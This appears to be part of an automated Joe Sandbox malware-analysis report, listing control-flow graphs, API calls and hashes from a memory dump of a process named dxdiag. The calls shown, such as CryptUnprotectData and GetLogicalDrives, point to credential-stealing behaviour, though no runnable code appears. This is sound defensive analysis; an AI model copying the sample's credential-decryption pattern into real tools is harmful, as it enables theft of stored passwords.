                                                                                                                control_flow_graph 204 4227b0-42282f 205 422830-422872 204->205 205->205 206 422874-4228b2 205->206 208 4228c0-4228dd 206->208 208->208 209 4228df-4228e9 208->209 210 422a32-422a37 209->210 211 4228f0-4228f5 209->211 212 422a40-422a48 209->212 213 422941-42294a 209->213 214 422934-42293e call 407fe0 209->214 215 42294b-422953 209->215 216 42292c 209->216 210->212 219 4228f7-4228fc 211->219 220 4228fe 211->220 221 422a51 212->221 222 422a4a-422a4f 212->222 214->213 217 422955-42295a 215->217 218 42295c 215->218 216->214 225 422963-422992 call 407fd0 217->225 218->225 226 422901-422925 call 407fd0 219->226 220->226 227 422a58-422aef call 407fd0 221->227 222->227 234 4229a0-4229b2 225->234 226->210 226->212 226->213 226->214 226->215 226->216 235 422af0-422b2f 227->235 234->234 236 4229b4-4229bc 234->236 235->235 238 422b31-422b3c 235->238 239 4229e1-4229ec 236->239 240 4229be-4229c3 236->240 241 422b61-422b72 238->241 242 422b3e-422b45 238->242 244 422a11-422a1b call 43c3b0 239->244 245 4229ee-4229f1 239->245 243 4229d0-4229df 240->243 247 422b91-422bad GetLogicalDrives call 43c3b0 241->247 248 422b74-422b77 241->248 246 422b50-422b5f 242->246 243->239 243->243 253 422a20-422a2b 244->253 252 422a00-422a0f 245->252 246->241 246->246 255 422e03 247->255 256 422d10 247->256 258 422cf6 247->258 259 422d16 247->259 260 422bb4-422bbc 247->260 261 422bc4-422be8 247->261 262 422cfc-422d09 call 407fe0 247->262 263 422d1c-422d28 call 407fe0 247->263 250 422b80-422b8f 248->250 250->247 250->250 252->244 252->252 253->210 253->212 253->255 253->256 257 422d31-422dc6 253->257 253->258 253->259 253->260 253->261 253->262 253->263 266 422dd0-422de9 257->266 260->261 265 422bf0-422c32 261->265 262->256 263->257 265->265 270 422c34-422caf 265->270 266->266 271 422deb-422df3 call 420b10 266->271 272 422cb0-422cd6 270->272 275 422df8-422dfb 271->275 272->272 274 422cd8-422cf3 call 420970 272->274 274->258 275->255
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: &*Jk$4)B$=>$|~
                                                                                                                • API String ID: 0-1009457168
                                                                                                                • Opcode ID: 6dff639c457a5e1b723c2f4fe0a185f0f85ad1e2a079d6f1e4c09787d9b02a4e
                                                                                                                • Instruction ID: 152786c77f951dd3dbca6d6113f2fe09001a096b4f0132f05b015a8fe36a5df1
                                                                                                                • Opcode Fuzzy Hash: 6dff639c457a5e1b723c2f4fe0a185f0f85ad1e2a079d6f1e4c09787d9b02a4e
                                                                                                                • Instruction Fuzzy Hash: 74F164B4A00215DFCB10CF68D9826ABBBB1FF85310F18826DD845AF355D378E942CB99

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 278 420b10-420b55 call 43c210 281 421294-4212a4 278->281 282 420b5b-420bb8 call 414830 call 4385e0 278->282 287 420bba-420bbd 282->287 288 420be5-420be9 287->288 289 420bbf-420be3 287->289 290 420beb-420bf6 288->290 289->287 291 420bf8 290->291 292 420bfd-420c16 290->292 293 420cb5-420cb8 291->293 294 420c18 292->294 295 420c1d-420c28 292->295 298 420cba 293->298 299 420cbc-420cc1 293->299 296 420ca4-420ca9 294->296 295->296 297 420c2a-420c9a call 439e40 295->297 303 420cab 296->303 304 420cad-420cb0 296->304 307 420c9f 297->307 298->299 300 420cc7-420cd7 299->300 301 4211c9-421202 call 438600 299->301 305 420cd9-420cf6 300->305 312 421204-421207 301->312 303->293 304->290 308 420e96 305->308 309 420cfc-420d1b 305->309 307->296 313 420e9a-420e9d 308->313 311 420d1d-420d20 309->311 314 420d22-420d37 311->314 315 420d39-420d57 call 4212b0 311->315 316 421209-42122d 312->316 317 42122f-421233 312->317 318 420ea5-420ebb call 4385e0 313->318 319 420e9f-420ea3 313->319 314->311 315->308 333 420d5d-420d86 315->333 316->312 321 421235-42123b 317->321 330 420ebf-420eca 318->330 331 420ebd-420ed1 318->331 322 420ed3-420ed5 319->322 328 42123f-421253 321->328 329 42123d 321->329 325 4211a3-4211a9 322->325 326 420edb-420f0c 322->326 336 4211b5-4211b9 325->336 337 4211ab-4211b3 325->337 332 420f0e-420f11 326->332 334 421257-42125d 328->334 335 421255 328->335 329->281 339 4211bd-4211bf 330->339 331->322 340 420f13-420f86 332->340 341 420f88-420fc2 332->341 342 420d88-420d8b 333->342 343 421284-421287 334->343 344 42125f-42127f call 439e40 334->344 335->343 345 4211bb 336->345 337->345 339->305 346 4211c5-4211c7 339->346 340->332 349 420fc9-420fcc 341->349 350 420db1-420dc8 call 4212b0 342->350 351 420d8d-420daf 342->351 347 421290-421292 343->347 348 421289-42128e 343->348 344->343 345->339 346->301 347->281 348->321 354 420ff4-420ff8 349->354 355 420fce-420ff2 349->355 361 420dd3-420df4 350->361 362 420dca-420dce 350->362 351->342 357 420ffa-421005 354->357 355->349 359 421007 357->359 360 42100c-421025 357->360 365 4210d5-4210df 359->365 366 421027 360->366 367 42102c-421037 360->367 363 420df6 361->363 364 420df8-420e94 call 407fd0 call 4144a0 call 407fe0 361->364 362->313 363->364 364->313 371 4210e3-421102 365->371 372 4210e1 365->372 368 4210c4-4210c9 366->368 367->368 369 42103d-4210ba call 439e40 367->369 375 4210cb 368->375 376 4210cd-4210d0 368->376 378 4210bf 369->378 377 421104-421107 371->377 372->371 375->365 376->357 380 421131-42113a 377->380 381 421109-42112f 377->381 378->368 383 42113e-421142 380->383 384 42113c 380->384 381->377 386 421144-42114b 383->386 385 421174-421177 384->385 389 421179-42118a call 438600 385->389 390 42118c-421192 385->390 387 42115b-421164 386->387 388 42114d-421159 386->388 392 421166 387->392 393 421168-42116e 387->393 388->386 396 421194-421197 389->396 390->396 397 421170-421172 392->397 393->397 396->325 400 421199-4211a1 396->400 397->385 400->339
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID: !@$,$\$]$^$b
                                                                                                                • API String ID: 1279760036-3534480190
                                                                                                                • Opcode ID: 50029825359f53049b828cf9af26bfa21e532a2affc0ca8f3bb32706d71598dd
                                                                                                                • Instruction ID: ebca42ed76a8c9da250c5dc1f0308dd38997bd67e4ab243a484973a2be5f2ac8
                                                                                                                • Opcode Fuzzy Hash: 50029825359f53049b828cf9af26bfa21e532a2affc0ca8f3bb32706d71598dd
                                                                                                                • Instruction Fuzzy Hash: 7F22AE7160C3A08FD324CF28944036FBBE1AB96324F594A6EE5E5873D2D7798845CB4B

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 402 408920-40892e call 439940 405 408a83-408a85 ExitProcess 402->405 406 408934-40893b call 432b30 402->406 409 408941-408965 GetCurrentProcessId GetCurrentThreadId 406->409 410 408a7e call 439dc0 406->410 412 408967-408969 409->412 413 40896b-408a0d GetForegroundWindow 409->413 410->405 412->413 414 408a5a-408a72 call 409ba0 413->414 415 408a0f-408a58 413->415 414->410 418 408a74 call 40cbf0 414->418 415->414 420 408a79 call 40b7a0 418->420 420->410
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentProcess$ExitForegroundThreadWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3118123366-0
                                                                                                                • Opcode ID: b6802a63dc855ea8cf6a96f0c0c01603e3ca00871471397b2fb2a3d67851cf4b
                                                                                                                • Instruction ID: 0d30fea2273658e8f12e1d2f8b086a2a35bf40361b224995e2d0f0fc3bd077a4
                                                                                                                • Opcode Fuzzy Hash: b6802a63dc855ea8cf6a96f0c0c01603e3ca00871471397b2fb2a3d67851cf4b
                                                                                                                • Instruction Fuzzy Hash: E6313833A043144FD308EF799D8621AF6D6ABC8350F06953EF8C8DB391DA749C05868A

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 422 40aae0-40ab0f 423 40ab10-40ab54 422->423 423->423 424 40ab56-40ac53 423->424 425 40ac60-40ac74 424->425 425->425 426 40ac76-40ac8f 425->426 427 40ac90-40acc3 426->427 427->427 428 40acc5-40acda call 40b7d0 427->428 430 40acdf-40ace4 428->430 431 40ade7-40ade9 430->431 432 40acea-40acfb 430->432 433 40af7c-40af88 431->433 434 40ad00-40ad38 432->434 434->434 435 40ad3a-40ad3f 434->435 436 40ad40-40ad4c 435->436 437 40ad53-40ad57 436->437 438 40ad4e-40ad51 436->438 439 40af73-40af79 call 438600 437->439 440 40ad5d-40ad77 437->440 438->436 438->437 439->433 442 40ad80-40ad9d 440->442 442->442 444 40ad9f-40ada8 442->444 445 40adaa-40adb2 444->445 446 40adee-40adf2 444->446 449 40adc7-40adcc 445->449 447 40af71 446->447 448 40adf8-40ae18 446->448 447->439 450 40ae20-40ae52 448->450 449->447 451 40add2-40add9 449->451 450->450 454 40ae54-40ae5d 450->454 452 40addb-40addd 451->452 453 40addf 451->453 452->453 455 40adc0-40adc5 453->455 456 40ade1-40ade5 453->456 457 40ae99-40ae9b 454->457 458 40ae5f-40ae67 454->458 455->446 455->449 456->455 457->447 459 40aea1-40aeb4 457->459 460 40ae79-40ae7e 458->460 461 40aec0-40af01 459->461 460->447 462 40ae84-40ae8b 460->462 461->461 463 40af03-40af0f 461->463 464 40ae91 462->464 465 40ae8d-40ae8f 462->465 466 40af11-40af1d 463->466 467 40af43-40af45 463->467 468 40ae70-40ae77 464->468 469 40ae93-40ae97 464->469 465->464 470 40af27-40af2c 466->470 471 40af4f-40af6f call 40a820 467->471 468->457 468->460 469->468 470->447 472 40af2e-40af35 470->472 471->439 474 40af37-40af39 472->474 475 40af3b 472->475 474->475 477 40af20-40af25 475->477 478 40af3d-40af41 475->478 477->470 479 40af47-40af4d 477->479 478->477 479->447 479->471
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: +$/8=+$/8=+$KRST
                                                                                                                • API String ID: 0-1235365206
                                                                                                                • Opcode ID: 4fa6eea03b5ea1160ce96f4ada282d6b801ef76b08be5e27514b240a772fc098
                                                                                                                • Instruction ID: 157f1745fbdc77b4c2282c5122e8992570511c6dc21cebd8a3ce22f79508730e
                                                                                                                • Opcode Fuzzy Hash: 4fa6eea03b5ea1160ce96f4ada282d6b801ef76b08be5e27514b240a772fc098
                                                                                                                • Instruction Fuzzy Hash: AEC1277264C3504BD314CF6584516ABFBE3AFD1304F18883DE4E5AB381D639891AC797

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 481 431262-431343 call 414850 GetSystemMetrics * 2 489 43134a-4313db 481->489
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 4116985748-3916222277
                                                                                                                • Opcode ID: ed2441843b2d6ce89a690faeaea5bdcfa444fb032f0210175a3dc45da2a87aca
                                                                                                                • Instruction ID: bf2bc5d8e4d95e73b8fdb797fadfe66e5eac667f6d15a87326ad77e9f8a434e9
                                                                                                                • Opcode Fuzzy Hash: ed2441843b2d6ce89a690faeaea5bdcfa444fb032f0210175a3dc45da2a87aca
                                                                                                                • Instruction Fuzzy Hash: 665182B0D142099FDB40EFACD985A9EBBF0BB88310F114569E499E7350D734AD48CF96

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 492 415971-4159a4 call 407fe0 call 43c550 497 415a11-415a17 call 407fe0 492->497 498 4159f0-415a04 call 401000 492->498 499 4159ab-4159d8 call 407fd0 call 43c620 492->499 500 415a1a-415a2f 492->500 501 4159df 492->501 497->500 498->497 499->497 499->498 499->500 499->501 504 415a30-415a4a 500->504 501->498 504->504 508 415a4c-415a54 504->508 510 415a56-415a65 508->510 511 415a9a-415afb call 401a50 508->511 514 415a70-415a77 510->514 520 415b00-415b1a 511->520 517 415a80-415a86 514->517 518 415a79-415a7c 514->518 517->511 519 415a88-415a97 call 439e40 517->519 518->514 521 415a7e 518->521 519->511 520->520 523 415b1c-415b3c call 401d90 520->523 521->511 527 415ed0 523->527 528 415b43-415b47 523->528 529 415ea6-415eac call 407fe0 523->529 530 415ed6 523->530 531 415ee8-415f4f 523->531 532 415c3b-415c42 523->532 533 415edc-415ee5 call 407fe0 523->533 534 415eaf-415ec8 call 43ba70 523->534 539 415b50-415b56 528->539 529->534 540 415f50-415f74 531->540 537 415c50-415c58 532->537 533->531 534->527 537->537 543 415c5a-415c76 537->543 539->539 545 415b58-415b7e 539->545 540->540 546 415f76-415f9a call 401d90 540->546 547 415db3 543->547 548 415c7c-415c81 543->548 549 415b80-415b83 545->549 550 415b85 545->550 546->527 546->529 546->530 546->531 546->532 546->533 546->534 555 415db6-415def call 407fd0 547->555 548->555 549->550 552 415b86-415b96 549->552 550->552 557 415b98-415b9b 552->557 558 415b9d-415ba1 552->558 561 415df0-415e14 555->561 557->558 560 415ba4-415bc8 call 407fd0 557->560 558->560 567 415c86-415c93 560->567 568 415bce-415c34 call 43ba70 CryptUnprotectData 560->568 561->561 563 415e16-415e1e 561->563 565 415e41-415e51 563->565 566 415e20-415e25 563->566 570 415e83 565->570 571 415e53-415e61 565->571 569 415e30-415e3f 566->569 573 415cb4-415d04 call 41cce0 * 2 567->573 568->527 568->529 568->530 568->531 568->532 568->533 568->534 569->565 569->569 577 415e8a-415ea0 call 408de0 570->577 575 415e70-415e7f 571->575 584 415ca0 573->584 585 415d06-415d1d call 41cce0 573->585 575->575 579 415e81 575->579 577->529 579->577 587 415ca4-415cae 584->587 589 415d30-415d59 585->589 590 415d1f-415d27 585->590 587->568 587->573 589->587 591 415d5f-415d7b call 41cce0 589->591 590->587 591->587 594 415d81-415d96 591->594 594->584
                                                                                                                APIs
                                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415C24
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                • String ID: Q
                                                                                                                • API String ID: 834300711-3463352047
                                                                                                                • Opcode ID: e8c8e02fa5489a845f6c984ef1467f98ecb597ddb46adf86ef07d069ee49b4f0
                                                                                                                • Instruction ID: 334bc079e22fc92185ed06b095f9784487d9b1feb53ebf903c8272a05930d261
                                                                                                                • Opcode Fuzzy Hash: e8c8e02fa5489a845f6c984ef1467f98ecb597ddb46adf86ef07d069ee49b4f0
                                                                                                                • Instruction Fuzzy Hash: 0BE1F3B55483818FD720CF24C8917EFBBA2EFD5314F04493DE4898B252EB389985CB4A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: &#$$}ji~
                                                                                                                • API String ID: 2994545307-3214320781
                                                                                                                • Opcode ID: 5931b0502365ebbec1996e2a82422ef558332029e6c540395b09d36738237def
                                                                                                                • Instruction ID: 7a21dba1f6b4e75eed38616ab3744ad9dd1eab9b40c1e5948c0a189561833efb
                                                                                                                • Opcode Fuzzy Hash: 5931b0502365ebbec1996e2a82422ef558332029e6c540395b09d36738237def
                                                                                                                • Instruction Fuzzy Hash: C3914B76B047105BD7149E24ECC2B7B73A2EBC1318F98843EE94687396E67C9C05D399
                                                                                                                APIs
                                                                                                                • LdrInitializeThunk.NTDLL(0043C1EB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00439E6E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: /J x
                                                                                                                • API String ID: 2994545307-1866642894
                                                                                                                • Opcode ID: f30544c505241ad8f6770229db064c02dd71acb82eae6ebeaea714bf93423867
                                                                                                                • Instruction ID: 874112095a5efa33bfbcb898a975de2e52caa01511d8d9f4d2bd4c75d1d74cee
                                                                                                                • Opcode Fuzzy Hash: f30544c505241ad8f6770229db064c02dd71acb82eae6ebeaea714bf93423867
                                                                                                                • Instruction Fuzzy Hash: 55518A71A043008FE724EE299C8166BF7A2EBC9714F299A3EE58457381DE389C018799
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: @
                                                                                                                • API String ID: 2994545307-2766056989
                                                                                                                • Opcode ID: 0a54cfb0382d90671bf8a8549960c687a3425552f5adc6159ffc4faefce21d6a
                                                                                                                • Instruction ID: a35a6d60c968e134acf55cef92dc51cc7359e84a70f9638e84e2e7fd5f809bf1
                                                                                                                • Opcode Fuzzy Hash: 0a54cfb0382d90671bf8a8549960c687a3425552f5adc6159ffc4faefce21d6a
                                                                                                                • Instruction Fuzzy Hash: D53102B15083048BD314EF14C8C16AFF7F5EF9A320F15A92EE99557390D3799848CB9A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 5ce9da3ec3eabb230dc047e1443a7ed10ff4abf91167f9ef0f8a3aa1cfdc4362
                                                                                                                • Instruction ID: 9a74d657e93f8d3f5cf240051ad191b629485e22a32f0a110a3d4ded04f7e6bd
                                                                                                                • Opcode Fuzzy Hash: 5ce9da3ec3eabb230dc047e1443a7ed10ff4abf91167f9ef0f8a3aa1cfdc4362
                                                                                                                • Instruction Fuzzy Hash: 4FA12532A083114BD314CE28D89156BBBE2EBDA314F29EA3EE9A597351D738DC05C785
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: b70ec3a45a838298925cd4cddba91232df754bc9f20b4abfcf63beb9f04927e9
                                                                                                                • Instruction ID: 1330599076484d40c3e41ed8303109be540c1e7eaad1d2ba3b2e5e3a43da2089
                                                                                                                • Opcode Fuzzy Hash: b70ec3a45a838298925cd4cddba91232df754bc9f20b4abfcf63beb9f04927e9
                                                                                                                • Instruction Fuzzy Hash: E07133316043018BD714EF28D8D1A7FB7E2EB89310F19E53EE8899B391DB389C409789
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d7d9fbbb4968f9e9959b441f158be0a7c4b757bd456b857d1f889996084494c4
                                                                                                                • Instruction ID: 058e7eb1b77869290f7d29a5434ce18bf9e6f536ede9c38a5ab45312e861f76d
                                                                                                                • Opcode Fuzzy Hash: d7d9fbbb4968f9e9959b441f158be0a7c4b757bd456b857d1f889996084494c4
                                                                                                                • Instruction Fuzzy Hash: 79A1073250C7818FD3149B38885126FBBD25BCA324F194B6EE5EA473D1D678C941C74B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: ddc78d1b04d6bec4008d7390ca24b1b937114dd695eca5aeaa2e66312c2f3a60
                                                                                                                • Instruction ID: 862a6d1eb3e04205f618e8bd76b9e7ff9fb97f5fdbb19bdb3795918c96e67ed1
                                                                                                                • Opcode Fuzzy Hash: ddc78d1b04d6bec4008d7390ca24b1b937114dd695eca5aeaa2e66312c2f3a60
                                                                                                                • Instruction Fuzzy Hash: EF3179726805018BDB1CDB28DC91A7E7362EB5E324F2A572ED492B77E1C7389C12C749
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 343dc57fd85ca318e9cab81e4ba610ce05acd3c36ba71d43b9120f80a9a00c8a
                                                                                                                • Instruction ID: 01ca3aed7babf808add9e7fd7257d4aa18570a6a75482a61117814391ff3c097
                                                                                                                • Opcode Fuzzy Hash: 343dc57fd85ca318e9cab81e4ba610ce05acd3c36ba71d43b9120f80a9a00c8a
                                                                                                                • Instruction Fuzzy Hash: AA31BF76B10A008BD728CF29C851B26B7E3BFC6304F19D12DD09AC77A5EB78A8018B54

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 480 40cc16-40cd80 CoInitializeEx * 2
                                                                                                                APIs
                                                                                                                • CoInitializeEx.OLE32(00000000,00000002), ref: 0040CC1A
                                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CD67
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID: (02N
                                                                                                                • API String ID: 2538663250-482182587
                                                                                                                • Opcode ID: 5dda1f8ef3903148d2f90ff3463849efe98f65f23156c3258cfb4110ce7950d6
                                                                                                                • Instruction ID: d17696292bc297aee8fb915d5703223a9b482fd72e7288d2817973478bab555f
                                                                                                                • Opcode Fuzzy Hash: 5dda1f8ef3903148d2f90ff3463849efe98f65f23156c3258cfb4110ce7950d6
                                                                                                                • Instruction Fuzzy Hash: 3E41B6B4D10B40AFD370EF39DA0B7127EB4AB05250F504B2DF9EA866D4E631A4198BD7
                                                                                                                APIs
                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CDB7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeSecurity
                                                                                                                • String ID: Nf
                                                                                                                • API String ID: 640775948-501009845
                                                                                                                • Opcode ID: cc0bac53719f05fd76b6ebac675668444252fa88d21156f1485ccdb508311816
                                                                                                                • Instruction ID: d4c561bf1a5b18bbc5a108682527e0612a5fd10810c78835407b1c78b182e784
                                                                                                                • Opcode Fuzzy Hash: cc0bac53719f05fd76b6ebac675668444252fa88d21156f1485ccdb508311816
                                                                                                                • Instruction Fuzzy Hash: 8AD092347D4240BAE2249708AC17F1022119302F55F300226B363EE2E0D9907141860D
                                                                                                                APIs
                                                                                                                • GetUserDefaultUILanguage.KERNELBASE ref: 004331B5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DefaultLanguageUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 95929093-0
                                                                                                                • Opcode ID: 2f573e232fa3002a4601395236eb5b6ae86ddd1d5b3cef5a9b094565ea09aab7
                                                                                                                • Instruction ID: 3dcccac6d406af36a65d69c1e0d77e321988698b0dd3df6f47d0d67d5a4e7b69
                                                                                                                • Opcode Fuzzy Hash: 2f573e232fa3002a4601395236eb5b6ae86ddd1d5b3cef5a9b094565ea09aab7
                                                                                                                • Instruction Fuzzy Hash: 5A119435A055848FCB19CF38CC54B5ABFF16F4B201F09C1EED95997392CA349909CB11
                                                                                                                APIs
                                                                                                                • RtlReAllocateHeap.NTDLL(?,00000000,?,?,00000000,-00001000,0043634D,00000000,-00001000,00000040,?,00000000), ref: 00439E12
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: eb7d745538af2e112f280afb521d2e7db1d87c50453d574173b658df3250f6e1
                                                                                                                • Instruction ID: f371fc5d33ece009c4c3a0571b7c3e2245088c9ce721a5e6db8221790f4f6db8
                                                                                                                • Opcode Fuzzy Hash: eb7d745538af2e112f280afb521d2e7db1d87c50453d574173b658df3250f6e1
                                                                                                                • Instruction Fuzzy Hash: 99E02B76514710EBC6005F64BC07B1B3B64EF8A712F01083AF44496152DB38E801C5EF
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
